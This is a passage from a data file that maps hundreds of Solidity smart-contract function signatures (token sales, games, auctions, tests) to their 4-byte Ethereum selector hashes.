"test_remove_notInList()": "0xadfa845a", "test_remove_tail()": "0x41808d4a", "test_remove_head()": "0x12dc6449", "test_remove_singleNode()": "0xe9ea666b", "test_remove()": "0xaee4c502", "addGuard(address)": "0x6913a63c", "changeController(address,address)": "0x3e11e378", "DGameController(address[])": "0xc72a480e", "create2()": "0xf5eacece", "get2()": "0xd2178b08", "set2(uint256)": "0xce01e1ec", "BaseToken(string,string,uint256)": "0xa365bd9f", "transferInternal(address,address,uint256)": "0x222f5be0", "notifyReceiver(address,address,uint256,bytes)": "0xf125561d", "run()": "0xc0406226", "AuthorizedAddresses()": "0xa6de42c8", "getRepresentedDTH(address)": "0x607af216", "testChangeRole()": "0xb207e32b", "testHasRole()": "0x74e5530d", "testSetRole()": "0x9327891e", "getRepo(bytes32,string)": "0x9d14f134", "addRepo(bytes32,string)": "0xfb02191c", "OpenFundFactory()": "0xb509bae5", "multipleHomocide()": "0xdd4f1f2a", "homicide()": "0x09e587a5", "deleteChannel(address,address,address,address,address)": "0x2a004bd0", "TestApprove()": "0x9b164ce3", "removeRange(uint256)": "0x1695d97c", "addRange(address)": "0x5b2b2194", "findActiveRange(address)": "0xdd5dcd52", "getRoundWeight(uint256,uint256)": "0x880b844f", "getSchellingRound(uint256)": "0x458e78d5", "checkReward()": "0xc4b24a46", "getRewards(address)": "0x79ee54f7", "checkVote()": "0xb0417e98", "sendVote(string)": "0x0146d0ca", "prepareVote(bytes32,uint256)": "0x36cd24aa", "schelling(address,address,bool)": "0xb6660af4", "getCurrentSchellingRound()": "0x6438c43e", "setCurrentSchellingRound(uint256)": "0x5ad55aa5", "setSchellingExpansion(uint256,uint256)": "0xcc423c28", "getSchellingExpansion(uint256)": "0xc80db88c", "getVoter(address)": "0xd4f50f98", "getCurrentRound()": "0xa32bf597", "setRound(uint256,uint256,uint256,uint256,uint256,bool)": "0x7b3bfc35", "pushRound(uint256,uint256,uint256,uint256,bool)": "0x723e357a", "setFunds(address,uint256)": "0x9fd3ad34", "getFunds(address)": "0xdecebbce", "schellingDB()": "0x98c23836", "ERC20Token(uint256,uint8,string,string)": "0x5cf6040b", "allowance(address,address,uint256)": "0x598af9e7", "TimeDecayingToken(address,uint256,string,uint8,string)": "0xa1bd55c2", "concatBytes(bytes,bytes)": "0x0bb0482f", "bytes32ToBytes(bytes32,bytes32[],bytes32)": "0x7de77700", "runTimeAfterSoftCapReached()": "0x363c9bca", "TOTAL_ICO_TOKENS()": "0xbd611c73", "percentage()": "0xc78ad77f", "gameOp()": "0x83a68993", "pieceWanted()": "0xb682c019", "sale_pause()": "0x752bf6f8", "allowances()": "0x3ed10b92", "preSaleprice()": "0x558da2e3", "airDropPercent_()": "0x7e4e95d7", "cardTokenAddress()": "0x7d1e97a1", "_TARGET_EPOCH_PER_PEDIOD()": "0xb1483eee", "shareProfits()": "0x26767cfe", "raisedIcoValue()": "0xb65418f5", "bighype()": "0x3cf274a5", "on_block()": "0xacc12168", "RATE_DAY_21()": "0x6f95dd0b", "memberShareCount()": "0xa95240c4", "UNLOCK_TEAM()": "0xc8cfd490", "limitEndDate()": "0x8d089930", "tokensForPartners()": "0x6b634440", "minSignId()": "0x8f9a57ef", "regularOpen()": "0x28a5e6f0", "closeTimer()": "0x5da24f90", "bthFoundationWallet()": "0x2fd3fc9d", "showValue()": "0x1c61bd38", "INIT_SUPPLY()": "0x956cc859", "ApplicationIsInDevelopment()": "0xdd6f0f19", "prod()": "0x0302c688", "percentWeiMC()": "0x4acb232b", "totaltransactions()": "0xe9bc9598", "firstReserveTimeLock()": "0xb3a0e188", "angelTimeLock()": "0x659d1185", "spinAll()": "0x0b4438e5", "priceTLP1()": "0x1613520f", "Partial8Transfer()": "0xbe154a18", "minWeiContribution()": "0x17dc86c5", "reserve_fund()": "0x59c2b584", "publicFundingPersonalEthLimit()": "0x15bf7ed2", "getGrantCount()": "0x7c1b6afe", "makeCount()": "0x59b09b25", "managerCountInt()": "0xed861e13", "logo()": "0xfb7f21eb", "secondsaleopeningTime()": "0x0bbed2b7", "tokenSwapLock()": "0xef40c3e6", "UP_totalBets()": "0x1e8a98cf", "lastMintedTokens()": "0xe3aeedc4", "TOKEN_FOR_SALE()": "0x608458eb", "unicornAddress()": "0xb7782455", "_initialized()": "0x3072cf60", "address5a()": "0x91d6212a", "lastBlock_a5Hash_uint256()": "0xf864bc65", "currentPhaseRate()": "0xcc326e1c", "numArbiters()": "0x189ae13c", "spentBalance()": "0xd8eebd8d", "s_pwd()": "0xb4eecb54", "keyValueStorage()": "0x5d4d061e", "MAX_TOTAL_SUPPLY()": "0x33039d3d", "transformAgent()": "0x851545de", "USDXGE()": "0x087bb610", "Stake()": "0xde20bc92", "moderator()": "0x38743904", "CPGPEREGRINE_EXTRACTION_BASE()": "0xc0615f09", "accountAddress()": "0x1e9b1312", "affPercent_()": "0xc291df56", "mintUserAdoptionTokens()": "0xd5193235", "ITTMultisig()": "0xb960a6d4", "startingBlock()": "0xd91c98d3", "hatchStartTime()": "0x92c537e9", "PRESALE_END_TIME()": "0x5ea27e40", "MAX_TOTAL()": "0xcd60fe35", "accMinterOne()": "0x7dfac5a2", "getDispute()": "0x948b557a", "lastDETCWC()": "0x13a9cd8d", "MINBET_perTX()": "0xba2d5c88", "PSM_PRICE()": "0x85a1c242", "getNumTransactions()": "0x4cf32de3", "Rate5()": "0xe89b2564", "ICO4Period()": "0x56bb4d4a", "prevOracle()": "0xd1fc0ddf", "getLuckyPendingSize()": "0x33cc9c3e", "LIQUIDATION_RESERVE_RATIO()": "0xa67f9997", "tCampaignEnd()": "0x1fccc158", "weiMinInvestment()": "0x408056e4", "coreTeamAddr()": "0x928d09dd", "foundationTimelock()": "0xec0de26e", "publishedWinningScoreThreshold()": "0xb768628f", "firstStageDuration()": "0x4fd7718b", "TimeWeekOne()": "0xe83c460d", "MAX_ALLOWED_STAGE_1()": "0xfe89a6c1", "totalNTD()": "0x1870a73a", "PoolBounty()": "0xe43cd900", "THOUSAND()": "0x851cad90", "ethSwapRate()": "0x3dc11dd1", "CharityReservesWallet()": "0x424b828f", "getPreSaleTokensAvailable()": "0xe55b55ce", "RELEASE()": "0x75d96718", "resumePreSale()": "0x44ac9d81", "maxInvestment()": "0x002e1316", "VESTING_TEAM_CLIFF()": "0x56c2c1f6", "tokensMasterNodes()": "0x650462ab", "getOriginalOwner()": "0xad913633", "getTransferStatus()": "0x1a6fb342", "setTransferStatus(bool)": "0x493770cc", "SpoutMintableToken()": "0x62c0e3b7", "totalICOSupply()": "0xbed1a924", "getICOStatus()": "0x19da8c99", "releaseIcoTokens()": "0xd64bcc1a", "changeOwnerShip(address)": "0x02be8e4e", "startIco(bool)": "0xefea0172", "LENRCoin(uint256,string,uint8,string)": "0x82c51376", "natecoin(uint256,string,string)": "0x0e1ac81f", "CART()": "0xbe31b600", "isERC165Interface(bytes32)": "0x9d4cf268", "canImplementInterfaceForAddress(address,bytes32)": "0xf0083250", "LAcoin()": "0x533b180e", "GroverBucks()": "0xd8493983", "MeetupToken(uint256,string,uint8,string)": "0x8f632a34", "KickToken()": "0xc3b0f915", "KickOwned()": "0x48724227", "GNOSIS()": "0x015ff39f", "PlatoToken()": "0x4026b261", "setPrevOwner(address)": "0xa07c132b", "setNextOwner(address)": "0x2d202d24", "setRevision(address)": "0x474b2541", "DocumentCertoChainContract(string,string,string,string)": "0xd0708e31", "DocumentCertoChainContract()": "0x9bafd22b", "setSealed()": "0x449c198d", "BaseCertoChainContract()": "0xdc799f88", "_safeCall(address,uint256)": "0x24e9dad8", "_safeTransfer(address,uint256)": "0xc4f8210e", "callETH(address)": "0x43ddc1b0", "sendETH(address)": "0x21b1e5f8", "ApodTokenContract()": "0xde578a90", "Blockdrop(address)": "0x4a275a1e", "JixoCoin(uint256,string,uint8,string)": "0x04474181", "RexToken(uint256,address)": "0xc73659be", "FilmoljupciCoin()": "0xe1ca1b7d", "getHighestPrice(uint256)": "0x8ff255d6", "getOwnerCards(address)": "0xbec77cb1", "_isAllowed(address,uint256)": "0xb6615acc", "setBeneficiaryAddress(uint256,address)": "0x0869b302", "setCharityFund(address)": "0x1ff2c22b", "evolveGeneration(uint16)": "0xf52fa89b", "_createCard(string,uint256,address,address,bool)": "0xe39b40d8", "createCardFromName(string)": "0x8fcf31e3", "createCard(string,uint256,address,address,bool)": "0xfbcfa0d7", "getOrder(uint256,address)": "0xcbbfe168", "tocancel(uint256)": "0xc28db642", "tosell(address,uint256,address,uint256,address,uint256,uint256)": "0x6168c9c3", "_tobuy(uint256,address,uint256,uint256)": "0x45a1d72a", "tobuy(uint256,address,uint256)": "0xba8d045a", "withdrawAmountToken(address,uint256)": "0x17421c8c", "withdrawAmountETH(uint256)": "0xf9fc4816", "getBuyerfee()": "0xa05e1db7", "getSellerfee()": "0x50807ecc", "getRunning()": "0x3924f089", "ownerWithdrawAccount(address)": "0xaa68894b", "ownerChangeBuyerfee(uint256)": "0x0df0de11", "ownerChangeSellerfee(uint256)": "0x941a8486", "ownerChangeRunning(bool)": "0x33ff588d", "EtherPush()": "0x97871e56", "SBSEducationToken()": "0x38d0e36f", "TieToken(address)": "0xef54af8b", "BetlyCoin()": "0xe06af204", "TrueUSD()": "0xbfd75da4", "issueClaimOwnership(address)": "0x0581345e", "renameList(address,string)": "0xa9c95328", "updateList(address,address,bool)": "0x37a87dfa", "finalizeMint(uint256)": "0x8e3af93f", "requestMint(address,uint256)": "0x31a02bce", "maximumToken()": "0xb8d5b7f0", "XRT()": "0x675d9c35", "OnlyOwner()": "0x5fc483c5", "Bilibit()": "0x1ea7b0f9", "EndorToken()": "0xdc669dd4", "split(address[])": "0x94e4a822", "Recash(uint256,string,string)": "0xc1c8b89d", "setRandomizer(address)": "0x767bcab5", "getRandomNumber(int256,int256)": "0x428eb5cf", "LalaToken()": "0xdd62b1a0", "getPony(uint256)": "0x36917dfa", "PonyCore()": "0x88d115af", "createPromoPony(uint256,address)": "0x75776fa4", "_createPony(uint256,uint256,uint256,uint256,address)": "0xf419c69d", "SiliconXCoin()": "0xd4d6adc0", "KevCoin()": "0xc5917695", "WavesPay()": "0xd8ae6139", "withdrawTokenManually(uint256)": "0xc6711049", "withdrawEtherManually()": "0xb19ab052", "TipSmart()": "0xff6f0d54", "ICO(string,string,uint8,uint256)": "0xfb6021ae", "TokenLinked()": "0xbb99999c", "CurrentRate()": "0x66a192c6", "SNSCOIN()": "0xc04c8e43", "PussyToken(uint256,string,string)": "0xa2ee8669", "EthereumHotCoin()": "0x700b7025", "CMDCrowdsale()": "0xf89e6512", "distribute(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x0e64780d", "_uintToSPDStr(uint256)": "0xf78fa141", "lockUpAmountStrOf(address,address)": "0xf9163e64", "getEngineerCurrentVirus(address)": "0x6424d686", "getEngineerPrizePool()": "0x8a545aec", "calculateShareETH(address,uint256)": "0x79eb16d4", "updateShareETH(address)": "0xa1d7ecbb", "atkBoss(uint256)": "0x614781f9", "endAtkBoss()": "0x9f94fb7a", "startNewBoss()": "0xf9ec2edb", "setHalfTimeAtkBoss(uint256)": "0x0b3fe32d", "setDefenceBoss(uint256)": "0x3b8678de", "DailyDivsSavings()": "0x7185637b", "UniverseChain()": "0x2c5b3b5b", "ZRSToken()": "0x5f791c7c", "LIB()": "0x79885b91", "COENXToken()": "0x6240c7aa", "JumboToken(string,string,uint256,uint256)": "0xb1d2372b", "getPlayerBetData(address)": "0xba5f3e46", "uintToBetsArray(uint256)": "0xa5dcf458", "betInputToBytes(uint40,uint40,uint40,uint40,uint40)": "0xc8e566c6", "ownerSetJackpotAddress(address)": "0xfac97122", "getSpinResults(uint256,address,uint256)": "0x08910fe6", "getSpinOutput(uint256,address,uint256)": "0x76ccb1fe", "getLastSpinOutput(address)": "0x66e4f8c8", "gamePayOutWinner(address)": "0x1d293500", "ownerWithdrawEth(address)": "0x3787a30a", "ownerWithdrawZth(address)": "0x028780e4", "ownerSetPayOutDivisor(uint256)": "0x96e264ff", "getJackpotBalance()": "0x9509ba0c", "getTotalOwnerAccounts()": "0xe3f96400", "setAllowPriceLower(bool)": "0x1ab59612", "setAllowPlayer(bool)": "0x9be2ff64", "transferBond(address,uint256)": "0xdd5b23df", "checkHalfLife()": "0x53beb1f8", "buy(uint256,uint256,address,address,address)": "0x42af8f0c", "tokenFallbackExpanded(address,uint256,bytes,address,address)": "0xa322accf", "tokenFallbackExpanded(address,uint256,bytes,address)": "0x4519c454", "setThresholdSendToSafeWallet(uint256)": "0x844c3edc", "setSendToSafeWalletPercentage(uint256)": "0x06c2f050", "saveLockedERC20Tokens(address,address,uint256)": "0xf0b30f69", "releaseForce(address,uint256[],uint256[])": "0x57880c04", "release(uint256[],uint256[])": "0x2bc588ee", "release_(address,uint256[],uint256[])": "0x1ef5b90f", "accept(address,uint256,uint256)": "0xeea6753b", "contractBalance_()": "0x3f0d9ad5", "getTimestamp_()": "0x9d4aba7c", "finishICOInternal()": "0xcf8f8f12", "tokens2ether(uint256)": "0x4d3cf035", "ether2tokens(uint256)": "0x72bc8fc6", "getTokenBonus()": "0x5698fb44", "changeCrowdsaleRate(uint256)": "0x5c07ac94", "Kentkoin()": "0x19f1d7b0", "releaseEndTimeOfStage(address,uint256)": "0x81553709", "amountOfStage(address,uint256)": "0x89fb75f9", "remainOfStage(address,uint256)": "0x4e6fedb7", "endTimeOfStage(address,uint256)": "0x8da8023c", "lockedStagesNum(address)": "0x6b57cb34", "decreaseRemainLockedOf(address,uint256,uint256)": "0x4621e552", "setNewReleaseEndTime(address,uint256,uint256)": "0x3495b21e", "changeEndTime(address,uint256,uint256)": "0x422c3ad9", "addressByIndex(uint256)": "0xd8ab9208", "walletName(address)": "0x223208af", "isExisted(address)": "0xaaad0c84", "addLockedTime(address,uint256,uint256,uint256)": "0x21765d23", "removeAccountAddress(address)": "0xc7bec318", "addAccount(address,string,uint256)": "0xf235bfa4", "VisualFodderCoin()": "0x93b3bb35", "ledgerRecordAdd(uint256,bytes32,uint256,string,uint256,bytes32,uint256)": "0x60ff77cc", "Autolen()": "0x490e2bd1", "TCEToken()": "0x09081c51", "AnimeToken(address,uint256)": "0x3e43e8b4", "resetICO()": "0x2c0a036b", "ONLY600Coin()": "0xd67b9a89", "CircusToken(address)": "0x53a5e68f", "setAllowHalfLife(bool)": "0x4383603b", "setAllowLocalBuy(bool)": "0xd550f044", "setHalfLifeRate(uint256)": "0x06787b98", "setHalfLifeTime(uint256)": "0x61b2bb37", "setExchangeAddress(address)": "0xd082ea8c", "returnTokensToExchange()": "0x083a3a74", "buy(uint256,uint256,address,address)": "0x82b2a559", "localBuy(uint256,address,address)": "0x92250c6a", "SandBoxERC20()": "0xaa188b29", "Shufflix()": "0x0f522614", "BluechipToken()": "0x9d7acf74", "BICOIN()": "0xee5e1551", "JorgeCoin()": "0x0cb9208a", "contractownsthismanyP3D()": "0x099b9531", "nextonetogetpaid()": "0xfa509eda", "playervanity(address)": "0xe7d2340f", "currentstageplayer2()": "0x6ade6cea", "currentstageplayer1()": "0x0daa431a", "previousstageplayer2()": "0x3c9ee04c", "previousstageplayer1()": "0x9af64d80", "previousstageloser()": "0x209b80ce", "setRewardAddress(address,address)": "0x39f8e560", "setStoreAddress(address,address)": "0xaaa51ec6", "isMixGen()": "0x3a7bd7b5", "getBuyPriceTimesByTime(uint256)": "0xc32935d7", "keysRec(uint256,uint256,uint256)": "0x39dba209", "recycleAfterEnd()": "0xa6e2eab1", "getBuyPriceTimes()": "0x8cc8baaf", "getHeartPrice()": "0xb29120fe", "claimAddress(address,uint256)": "0x940df414", "claimAddresses(address[],uint256)": "0x9373b8bd", "createOnRound(uint256)": "0xf25c130a", "roundFor(uint256)": "0xffe4fe4c", "currRound()": "0x3f5d8056", "removeAdminList(address[])": "0xca0d9564", "addAdminList(address[])": "0x5c9442a1", "claimRaisedWei(address,address)": "0xd2c33eb2", "pauseCrowdsale(address)": "0x82eed60c", "_enableRefunds(address)": "0xf72047ff", "_payCommission(address)": "0x8f9bf95d", "createCrowdsale(address,address,uint256,uint256,uint256,uint256,uint256,bool,uint8)": "0x9d532041", "setCommissionWallet(address)": "0x7d60b6ce", "GRCToken()": "0xc0e91569", "reclaimTokenOwnership()": "0x769643bc", "finishTokenMinting()": "0x96d37936", "bulkTokenSend(address[],uint256[])": "0x04194636", "bulkTokenSend(address[],uint256)": "0x965beae8", "bulkTokenMint(address[],uint256[])": "0x8cc55473", "bulkTokenMint(address[],uint256)": "0x8f1b0b02", "TRcoin()": "0x88dc0d49", "random(bytes32)": "0xd4ce545a", "getWords(uint256)": "0x76f9378d", "BAILSToken(uint256)": "0x6ad34a7a", "ChristopherRobinRT()": "0x46d36fa0", "changeBaseValue(uint256,uint256,uint256,uint256,uint256,uint256)": "0xb01afdab", "StartPreSale()": "0xe850899a", "EndPreSale()": "0x9aac9e91", "startEthGetToken()": "0xf7750bd5", "endEthGetToken()": "0x59d27be8", "ScorpioCoin(address)": "0x429374f3", "LAYA()": "0x4e1dc0d7", "BITCOINGAME()": "0x2a5eb26a", "GteChainERC20()": "0xb611d649", "computeDeadline()": "0xefa4f94d", "FOMO3DLite()": "0x48afc0fe", "getCurrentlyClaimableAmount(address)": "0xc828e6ee", "ZIL()": "0x9c0770fe", "_processAirdrop(address,uint256)": "0x3c4961ff", "sendAirDrops(address)": "0xb6fca0df", "IndoCrypt()": "0xa6e1bc7c", "SASH()": "0xb9d5205c", "AriesToken()": "0x0a56094d", "ConnectiusToken(uint256)": "0xc3be259f", "setRefundPercent(uint256)": "0x5cdb1bd7", "getInvestorsAndTheirBalances()": "0x3b360c7f", "transferBulk(address[],uint256[])": "0x9316c3e7", "adminTransfer(address,uint256)": "0xf17e48ec", "transferToAdmin(uint256)": "0x09fffec0", "verifyIt(bool)": "0xb6b1e359", "plyr_(uint256)": "0xde7874f3", "airDropPot_()": "0xd87574e0", "activated_()": "0xd53b2679", "potSplit_(uint256)": "0xc519500e", "plyrRnds_(uint256,uint256)": "0xa2bccae9", "rID_()": "0x624ae5c0", "rndTmEth_(uint256,uint256)": "0x5893d481", "pIDxName_(bytes32)": "0x2e19ebdc", "fees_(uint256)": "0x2ce21999", "plyrNames_(uint256,bytes32)": "0x2660316e", "round_(uint256)": "0x24c33d33", "airDropTracker_()": "0x11a09ae7", "pIDxAddr_(address)": "0x10f01eba", "generateDna(uint256[])": "0xff9f3055", "getBountyChance(uint256)": "0xd67a1694", "getPlanetDetails(uint256,uint256)": "0xd22c78f8", "withdrawToContractOwner(uint256)": "0xd1a9eb19", "giftPlanet(uint256,uint256,address)": "0xb770c7ef", "editPlanet(uint256,uint256,string,string)": "0xa25fdcec", "getBountyAmount(uint256)": "0x9cb481ea", "getTypeFromIndex(uint256,uint256)": "0x8be1049d", "getGalaxies()": "0x81a8e78a", "addToBounty(uint256)": "0x4dc958e1", "createNewGalaxy(string,uint256)": "0x35da3c1a", "invadePlanets(uint256,uint256[],uint256[])": "0x2b7e4295", "getGalaxy(uint256)": "0x1e3b92b4", "pullBounty(uint256)": "0x17a96982", "getPlanetOwners(uint256,uint256)": "0x0ed68aa5", "changeChanceToWinModule(uint256)": "0x05d1127f", "QBankChain()": "0xf2021550", "EtherModifierPandee()": "0xf5818d94", "cgadmin(address)": "0xe68c32b3", "SetAllow(address)": "0xc914ef54", "ShouWangXingAIGO(uint256,string,uint8,string)": "0x6fa23eac", "PALToken(uint256,address)": "0x2e2ed6a7", "TaiwanRepublic(uint256,string,string)": "0x9dc6c12b", "endGame(uint256,address,address,address)": "0xb7c55259", "startGame(address[],uint256)": "0x29062d76", "flush(uint256)": "0xb3d1958d", "getServer(uint256)": "0x546b270d", "removeServer(uint256)": "0xaadad773", "addServer(string,uint256)": "0x826c6f73", "setAdditionalBonusPercent(uint8)": "0x47241a27", "setDivisor(uint256)": "0x709f5ccc", "getRocOwnerItem(uint256)": "0xf0794ca6", "getHunting(uint256,uint256)": "0x2a304900", "getItemIndexToOwner(uint256)": "0x0b0740ae", "getMarketsItemId(uint256)": "0xb86c49e1", "getItemItemId(uint256)": "0x70de1e30", "_getReferralBonus(uint256)": "0x44c010c6", "_isRateActual(uint256)": "0x266578d0", "setOraclizeGasLimit(uint256,uint256)": "0xea110eda", "_isSaleContract()": "0x75401eac", "balanceSpot(address)": "0x549767c7", "allocate(address,uint256,uint256)": "0xab3f22d5", "setSaleContracts(address,address,address)": "0xbe9aa8ac", "_lockup(address,uint256,uint256)": "0x0c662943", "balanceLockedUp(address)": "0x197cb5bc", "hasLockedUp(address)": "0x7213cff1", "lockedUpCount(address)": "0x5633c442", "setWord()": "0x85f01859", "increaseContribution(address,uint256)": "0xc359a2a4", "getEligibleAmount(address,uint256)": "0x670a1e6f", "updateWhiteLists(address[],bool[])": "0xe344ce6b", "updateWhiteList(address,bool)": "0xac1d0609", "getDataByDeviceId(uint8,uint8)": "0x5eaad235", "getKeysByDeviceId(uint8,uint8)": "0x8b473c3d", "YKC(uint256,string,uint8,string)": "0xae9a9295", "ShopperlyGlobalToken()": "0x568287ee", "fallback(address,bytes)": "0x09f90127", "calledUpdate(address,address)": "0x70cfaa8d", "KAL4Token()": "0xc7ba9264", "THANKSTEST3()": "0x8c8d36c2", "closeAnyGame(uint256)": "0x092d3de4", "sendAllFeesToAddress(address)": "0x37fcb779", "getTimeRemaining(uint256)": "0x8cd42991", "getGameExpired(uint256)": "0x8a0193ac", "getGameStatus(uint256)": "0x0f1bf454", "joinGameRandom(uint8)": "0xb0867a5c", "createGame(uint8,bytes32)": "0x3efd1403", "RockPaperScissorsAdvanced()": "0x4ba2ab8a", "getAllElement()": "0xb76b78fb", "getFirstElement()": "0xae5c24bd", "getAnyElementByIndex(uint256)": "0xd5e0b616", "deleteElementWithValue(uint256)": "0x22246200", "popElement()": "0x9a6fcbdd", "popElementWithPos(uint256)": "0xdf68fd99", "allBalance()": "0x33833037", "getJackpotLoseSide(address,address)": "0x526a99c8", "payRewardForAddress(address,address)": "0xf908326b", "getRewardForAddress(address,address)": "0x4f6d20a9", "createBet(uint256,bool)": "0x672fcd82", "setContractProtection(bool)": "0xf022d9f6", "PlanetagroExchange(address)": "0x04f24897", "TORCToken()": "0xe8d6b5aa", "BetSetAnswer(uint256)": "0x68f399f4", "getRegister(string,bytes32)": "0x4e8afc5f", "setNewRegister(string,bytes32,uint256)": "0xb990033e", "isRepeated(string)": "0x25c95538", "revealBid(bytes32,address,uint256,address,address,address,uint256,uint256)": "0x2630ee9f", "createBid(bytes32,address,uint256)": "0x1c997344", "_revealBid(bytes32,address,uint256,address,address,address,uint256,uint256)": "0xcfa675cc", "_createBid(bytes32,address,uint256)": "0x2d00b442", "removeProxyForSender(address,address)": "0xfa27e070", "addProxyForSender(address,address)": "0x3d7bed99", "addProxy(address)": "0x23b11d8d", "isProxyForSender(address,address)": "0x5b791420", "isProxy(address)": "0x29710388", "isProxyOrSender(address)": "0x0a0fac2b", "revealBid(bytes32,uint256,address,address,address,uint256,uint256)": "0xd954af09", "createBid(bytes32,uint256)": "0x1277b0c9", "_setClearingPrice(bytes32,uint256)": "0xc01f475f", "_setBidState(bytes32,uint8)": "0xdf2cdbed", "_setAuctionStatus(bytes32,uint8)": "0x1c637987", "_setAllocationFee(bytes32,uint256)": "0xe3fe0317", "_createBid(address,uint256,address,address,address,uint256,uint256)": "0x5dcb6774", "_removeProxyManager(address)": "0x01090c4e", "renounceProxyManager()": "0x4e4fbee1", "addProxyManager(address)": "0x13bbae9b", "isProxyManager(address)": "0xf25ebdad", "setClearingPrice(bytes32,uint256)": "0x2888c701", "setBidState(bytes32,uint8)": "0xaf2e285c", "setAuctionStatus(bytes32,uint8)": "0xcceb9214", "setAllocationFee(bytes32,uint256)": "0x00f1c7ec", "createBid(uint256,address,address,address,uint256,uint256)": "0xfae17e21", "allocationFee(bytes32)": "0x0c5f9a60", "bidState(bytes32)": "0x1bbce9a2", "auctionStatus(bytes32)": "0xb0603326", "clearingPrice(bytes32)": "0x7fe551fd", "bidPrice(bytes32)": "0x59faf062", "durationSec(bytes32)": "0x99f6021d", "license(bytes32)": "0x4024db80", "schema(bytes32)": "0x072b9cf2", "bidder(bytes32)": "0xe90acd53", "auction(bytes32)": "0x715ede94", "creator(bytes32)": "0x9f5ac8f7", "verifyStoredData(bytes32)": "0x8121b0d4", "hashBid(address,uint256,address,address,address,uint256,uint256)": "0x4a2e7752", "Telcoin(address)": "0xce42fa88", "GridcubePlatformToken()": "0x5007ff15", "buy(address,address,uint256,uint256,uint256)": "0x76165adf", "avatar(address,uint256,bytes)": "0xc0e31001", "pay(address,uint256,bytes)": "0x911adc1a", "pay(address,uint256,uint256[])": "0x42f85ce5", "isOwnner(address)": "0x817287d0", "undoTransferOwner()": "0xbea28a30", "confirmTransferOwner()": "0x58057468", "receiveApproval(bytes)": "0x8a29b77d", "receiveApproval(uint256[])": "0xaaf592bf", "push(address,uint256)": "0xb753a98c", "testInitialBalanceWithNewRGXBonus()": "0x0358c295", "payrollCount()": "0x0a883790", "hasPayroll(address,address)": "0x75659508", "processPayroll(address,uint256)": "0xd940c3ee", "markHours(bytes32,int256)": "0x9081c3db", "markHours(bytes32,bytes32,int256)": "0x114d081d", "SpiceHours(address)": "0xca7275cc", "allocateShareholder(address,uint32)": "0x8daed4c4", "findShareholder(address)": "0x7d2a47b9", "allocateDividends()": "0x9509a265", "withdrawal()": "0xd4e93292", "RevenueSharingContract()": "0x9d9b2e82", "ownerRecoverTokens(address)": "0x9427dfea", "ownerTransferWei(address,uint256)": "0x60d26f01", "ownerEnableRefunds()": "0x7c436a6d", "ownerTopUp()": "0xe8a7e256", "determineDiscountRate()": "0xa75c8546", "UnitySale(address,bool,uint256,uint256,uint256,uint256,uint256,uint256[])": "0x6788317a", "whoIS(string,bool)": "0x48e5c71f", "coinData(address)": "0x2642567e", "ownedCoin(address,uint256)": "0x70be8a86", "readCoin(uint256)": "0xf33f9522", "incrementCoin(address,uint256,bool)": "0x889fb53e", "setDisclaimer(string)": "0x9a429d2f", "registerCoinData2(address,uint256,address)": "0xbebd284e", "registerCoinData(address,uint256,uint256)": "0x565fd2a7", "hyperEnable(address,bool)": "0x86f876e2", "registerName(string,address,string)": "0xd2bbda29", "registerCoin(address,string,string)": "0x83d8e480", "setController(address,bool)": "0xe0dba60f", "addTokenFunds()": "0xef3229db", "CrowdsaleToken(string,string,uint256,uint256,bool)": "0xcdf99413", "offerToChannel(address,uint256)": "0xde009e7f", "channelsSold()": "0x84386004", "officialSold()": "0x69d4f28e", "blockTime()": "0x48b15166", "VENSale()": "0x34831b79", "strToBytes32(string)": "0x97dedb06", "verify(uint256,uint256,uint256,string,string,bytes32[2])": "0x8c118cf1", "setVerificationCodeHash(string)": "0x4862e650", "OraclizeVerifier(address,string,uint256,uint256)": "0xc49a3b04", "getAQL(address)": "0x942a8ad3", "getDefaultAQL()": "0xbd9fbe7b", "getBQL()": "0x0bc8982f", "getQuotas()": "0xcdbcff6d", "setAQL(address,uint256)": "0x499a1bcd", "setDefaultAQL(uint256)": "0xb107ea12", "setBQL(uint256)": "0x931cd0cc", "setConstantsContract(address)": "0xf876101c", "OwnedController(address,address)": "0x96389bd7", "setUserStatus(address,uint8)": "0x920e3c96", "setUserNotifications(bool[],bool,uint8[],uint8)": "0x5533ffad", "EthlanceUser2(address)": "0x85512e5b", "addChild(address,address)": "0x8bd0ba67", "deleteChild(address,address)": "0xad3f972e", "checkScope(address,address)": "0xeadf4672", "deleteAccounts(address,address,address[])": "0xd86df333", "addAccounts(address,address,address[])": "0x2c84e31f", "updateGroupName(address,address,bytes32)": "0x7eafcdb1", "deleteGroup(address,address)": "0xbaeb8cad", "newGroup(address,bytes32,address[])": "0xd7cd7209", "testDieIfMinReturn0()": "0x2e336eea", "testIsContractAddress()": "0xe0f06352", "testIsContractZero()": "0x405b8816", "revertCall()": "0xf38fb65b", "testFailIfReverts()": "0xa8f8e2ae", "revertIfReturnLessThanMinAndDie()": "0xea4796b9", "testSelfdestructIsRevertedWithMinReturn()": "0x7e49aa05", "revertIfReturnLessThanMin()": "0x1e0a24b1", "testFailsIfReturnLessThanMin()": "0x9c821ac4", "testMinReturn32WithReturn()": "0x35c7421b", "testMinReturn0WithReturn()": "0xd241ead8", "testMinReturn0WithoutReturn()": "0x68df5ca4", "dontReturn()": "0xf74c753f", "returnSomething()": "0xf627fe6c", "getBookmarks()": "0x45d9bd15", "bookmark(string)": "0x27243160", "Bookmark()": "0x9cc3b949", "setPayrollAddress(address)": "0x202ca027", "binScan(uint256,address)": "0x43d111ae", "addContractor(address,uint256)": "0x5935fba5", "addWasteType(string)": "0xf54da8ee", "REALMock(address)": "0x4299431e", "balancing(int256,int256,uint256)": "0x2e8c0ac2", "trade(int256,int256)": "0x09d60069", "aggregate()": "0xaf36778b", "sendInput(int256,int256)": "0x7fe8ca66", "getEntitiesCount()": "0x82f2045c", "triggerInput()": "0x712b1ed0", "addEntity(string)": "0x2953f198", "createOrder(address,address[3],uint256[5],int256)": "0xec5aceab", "createOrderHash(address,address[3],uint256[5],int256)": "0x36a716da", "distoryAndSend(address)": "0x8937e223", "distory()": "0xf60ca6b6", "testWIP()": "0x1cc6ba74", "getFlag(string)": "0x74b3ee18", "setFlag(string,uint256)": "0xea8b3e9f", "set(string,string)": "0xe942b516", "Foo(string,string)": "0x3e99d2c9", "changeBroker(address)": "0x655e0d38", "BrokerImp(address,address,uint256,address)": "0x41c14eb4", "addAddressToWhitelist(address,address)": "0xda6443ad", "BETHER()": "0xe14e5ca4", "setWhitelistTransfer(address,address,bool)": "0xf3a3abc6", "setAllowTransferWhitelist(bool)": "0xfc1f2d46", "setWhitelisting(bool)": "0x5af5f7ba", "convertMint(address,uint256)": "0x5ec1fc19", 